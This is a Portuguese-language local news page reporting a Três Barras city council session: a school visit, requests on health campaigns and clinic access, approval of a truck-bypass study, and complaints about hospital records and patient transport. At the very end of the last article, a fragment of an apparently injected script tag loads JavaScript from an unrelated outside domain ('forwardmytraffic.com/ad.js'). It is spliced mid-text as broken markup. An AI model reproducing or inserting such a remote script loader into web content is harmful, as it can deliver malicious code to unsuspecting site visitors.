InícioDestaqueAlunos da Escola Frei Menandro Kamps acompanham sessão da câmara

Alunos da Escola Frei Menandro Kamps acompanham sessão da câmara

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Os alunos da Escola de Educação Básica Frei Menando Kamps, do distrito do São Cristóvão em Três Barras, acompanhara a sessão da Câmara de Vereadores na última quarta-feira, 13. Eles lotaram a casa e puderam conhecer o trabalho dos edis que deliberaram sobre um projeto para o desvio de caminhões da Avenida Rigesa.

O presidente da casa, Cerival da Cruz (DEM) que tem domicílio onde está instalada a unidade de ensino, agradeceu a presença dos estudantes “venham sempre acompanhar as sessões, essa é a casa do povo”, destacou.

Cerca de 80 estudantes das primeiras, segundas e terceiras séries do período noturno estiveram presentes, acompanhados do professor Ethel Jacomel que leciona as disciplinas de Geografia e História. Aos vereadores destacou que entre os assuntos abordados em sala está o dos “poderes brasileiros” e como funciona o sistema político.

O vereador Marco Antônio de Souza, Gorguinho (MDB), citou que o Brasil vive um momento ímpar e que a mudança só vai acontecer com a participação popular: “vocês podem ser os agentes que vão transformar a história”, disse aos estudantes.

O vereador Fabiano José Mendes, Bano (PSD), também destacou a presença dos estudantes e lembrou-se de quando ele ocupava os bancos escolares: “eu estudei no Frei Menandro Kamps, tenho muito orgulho e fico honrado em ver vocês aqui”, comentou.

Outros vereadores também destacaram como benéfica a visita dos alunos, caso de Carla Shimoguiri (PTB), Ernani Wogeinaki Jr (PSB), Edenilson Enguel (PSD), João Canani (PSB) e Siomara Muhlmann Correa (PP).

 

Carla Shimoguiri sugere que as campanhas das cores sejam periódicas no município

Ao exemplo do Outubro Rosa e Novembro azul, a vereadora quer que outros meses também sejam destacados

A vereadora Carla Shimoguiri (PTB) solicitou que o executivo, através da secretaria da saúde, torne periódicas as campanhas das cores no município de Três Barras. Ela apresentou a questão via indicação na sessão da última quarta-feira, 13. O objetivo é trabalhar com foco na conscientização e prevenção.

Carla destacou que as pessoas já estão acostumadas com o Outubro Rosa e com o Novembro Azul e que os outros meses também devem receber atenção: “Quando são realizadas as campanhas, inclusive com a iluminação do posto de saúde com a cor do mês, chama a atenção e empolga as pessoas a cuidarem da saúde”, destacou na tribuna ao defender a indicação.

No texto a vereadora destaca que “apesar de não haver um calendário oficial, há um calendário que circula na mídia com uma campanha de cores desde o mês de janeiro até dezembro, identificando quais doenças podem receber uma atenção maior dos órgãos públicos para prevenção”, escreve.

Na tribuna a vereadora também afirmou que a cidade irá receber o projeto Unidade Móvel SESC Saúde Mulher que oferecerá gratuitamente a realização de exames de mamografia digital e o exame citopatológico (papanicolau que previne o câncer de colo uterino). Serão dois mil atendimentos à população, conquistados através de um convênio entre a Prefeitura Municipal e o Serviço Social do Comércio.

 

Gorguinho solicita que Executivo reconsidere decisão de deslocar pacientes do Bairro Argentina para o João Paulo II

Vereador também criticou a falta de publicidade no resultado da auditoria do Ministério da Saúde a respeito da Unidade do Centro e que absolveu Elói José Quege.

O vereador Marco Antônio de Souza, Gorguinho (MDB), apresentou indicação na sessão da última quarta-feira, 13, solicitando que o executivo reconsidere a decisão em deslocar os pacientes do Bairro Argentina para a unidade de saúde do Bairro João Paulo II. Ele diz que a medida pode prejudicar os munícipes que não tenham automóveis para percorrer a distância entre o local onde moram e a unidade.

Pelo texto é de conhecimento público que a Administração Municipal considera a possibilidade de reformular o procedimento para o atendimento nos postos de saúde do município. Para ele a decisão causa “apreensão ao fazer com que os moradores do Argentina tenham que se deslocar até o bairro vizinho”, destaca, “já que na maioria das vezes a população precisa do atendimento para crianças”, argumenta.

Ele solicita ainda que o executivo possibilite que os moradores desse bairro possam ser atendidos nos postos do “bairro Vila Nova ou na Unidade do Centro da cidade, caso essa seja colocada em funcionamento, ou ainda que continuem a ser atendidas na Unidade Central”, finaliza.

A vereadora Siomara Muhlmann Correa (PP), que também atua na Secretaria de Saúde, argumentou em resposta ao vereador que a decisão pode ser apreciada pelo executivo e a respeito da Unidade do Centro, afirmou que o Ministério da Saúde enviou o recurso para a construção da estrutura física, porém, não o de atendimento e que por isso ela não está em funcionamento.

 

POSTO DE SAÚDE SEM RAMPA DE ACESSO

Gorguinho também criticou a falta de publicidade a respeito da Auditoria do Ministério da Saúde em relação à Unidade do Centro, construída na gestão anterior e que resultou na absolvição do ex-prefeito Elói José Quege. Para ele, a divulgação foi desproporcional em relação à publicidade de críticas feitas no início do mandato de Luiz Shimoguiri, que alegava a falta de acesso à estrutura, naquela época, recém finalizada.

O caso chegou a ganhar repercussão nacional, sendo inclusive, citada em portais de humor que alegavam que os pacientes precisariam de “asas” para acessar a Unidade, construída sem rampas.

Siomara voltou a apresentar a versão do executivo, na qual, argumenta que de fato, segundo a auditoria, o projeto inicial não previa o acesso por rampas, o que caracteriza que o empreendimento foi erguido conforme projeto apresentado ao ministério.

Atualmente as rampas foram construídas com projeto complementar pela atual gestão. A unidade, no entanto, continua sem funcionamento.

 

Câmara aprova recurso para estudo técnico do desvio do Trânsito de Caminhões

Vereadores autorizaram o executivo a contratar empresa para realizar estudo de melhor traçado

Os vereadores de Três Barras aprovaram na última quarta-feira, 13, o projeto de lei que autoriza a prefeitura a contratar uma empresa terceirizada para realizar o estudo de qual é o melhor traçado no desvio do tráfego de caminhões no município. O tema é um dos principais desafios da cidade que recebe fluxo das rodovias SC 120 e PR 151.

De acordo com o texto, a prefeitura fica autorizada a contratar uma empresa de consultoria para elaborar estudos e projetos para execução de um novo traçado interligando as rodovias, e assim, retirar o fluxo de caminhões da Avenida Rigesa. Uma citação da tribuna foi adicionada à ata da sessão, fixando como valor máximo para contratação a importância de R$ 50 mil reais.

“O projeto veio do executivo, porém sem um valor máximo para contratação, então pedimos a informação do executivo e recebemos um ofício com a resposta de que o valor não ultrapassaria 50 mil reais”, comentou a vereadora Siomara Muhlmann Correa (PP).

O vereador Ernani Wogeinaki Jr (PSB), argumentou que “o projeto veio com essa falha e seria importante que nos próximos constasse no corpo da lei, então que se registre em ata, e que confiando no ofício do executivo, meu voto é favorável”, justificou.

Já João Fancisco Canani (PSB), destacou a importância do desvio: “eu estive em São Mateus do Sul quando o então governador do Paraná, Beto Richa (PSDB), anunciou a obra que liga a cidade de Irati a São Mateus, essa obra deve começar em setembro e depois de finalizada o fluxo de caminhões estoura aqui em Três Barras, é urgente”, defendeu.

O vereador Marco Antônio de Souza, Gorguinho (MDB), apesar de favorável, argumentou que “acha estranho que é um projeto autorizando o executivo a contratar uma empresa para ver qual é o melhor traçado, mas pelo que consta as obras já começaram, parece que o projeto está vindo um pouco tarde”, alertou.

A votação foi unânime e segue para a sanção do chefe do executivo, Luiz Shimoguiri (PSD).

 

Bano critica respostas recebidas da Fundação Hospitalar de Três Barras

A resposta veio em diversos documentos os quais foram empilhados ao lado da tribuna

O vereador Fabiano José Mendes, Bano (PSD), criticou a resposta aos seus requerimentos, recebida da Fundação Hospitalar de Três Barras. Para ele, a documentação enviada dificulta o trabalho dos vereadores. A alegação foi feita na sessão da última quarta-feira, 13, ao utilizar a Palavra Livre da câmara.

“Eu fiz o requerimento pedindo informações dos repasses que foram feitos ao hospital”, disse o vereador. A resposta, no entanto, veio em diversos documentos os quais foram empilhados ao lado da tribuna pelo edil.                 “É impossível eu conseguir verificar as informações que eu pedi com todo esse volume”, reclamou

Segundo Bano, ele vai precisar de “um servidor para enumerar as páginas e auxiliar na verificação e apresentar uma resposta rápida aos colegas”, comentou.

O vereador explica que não deseja criticar a administração municipal, mas que a resposta poderia ter vindo de forma mais organizada.

Ao destacar o trabalho do Hospital Felix da Costa Gomes, afirmou ainda que “é uma instituição que temos de ajudar, que precisamos buscar recursos”, garantiu.

 

Enguel volta a cobrar reativação do carro da intendência

De acordo com o vereador o transporte de pacientes está prejudicado

O vereador Edenilson Enguel (PSD), voltou a cobrar do executivo que reative o carro da intendência no Distrito do São Cristóvão para o transporte noturno de pacientes da localidade até a Unidade Central de Saúde na sede do município. De acordo com ele, atualmente o serviço existente não consegue atender a demanda do distrito.

Ao utilizar a Palavra Livre da sessão da última quarta-feira, 13, o vereador enfatizou que “só ficaram nove agentes de saúde no bairro e o carro, que já fazia muita falta, faz ainda mais”. “Eu presenciei na Unidade Mário Mussi que médico com o tempo esgotado já, ainda tendo de atender idosos e pessoas que não podiam vir até a Unidade Central”, complementou.

A vereadora Siomara Muhlmann Correa (PP), que também atua na Secretaria de Saúde, defendeu a instituição afirmando que já há um carro que faz o serviço até a noite, que o horário de atendimento da unidade será ampliado no São Cristóvão e que uma ambulância será adquirida para a localidade.

Enguel rebateu: “o que existe hoje não é suficiente, e que as pessoas até são levadas em caráter de emergência para Unidade Central, mas que não tem como retornar (…) peço que a prefeitura analise a questão e possa resolver o problema”, finalizou… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.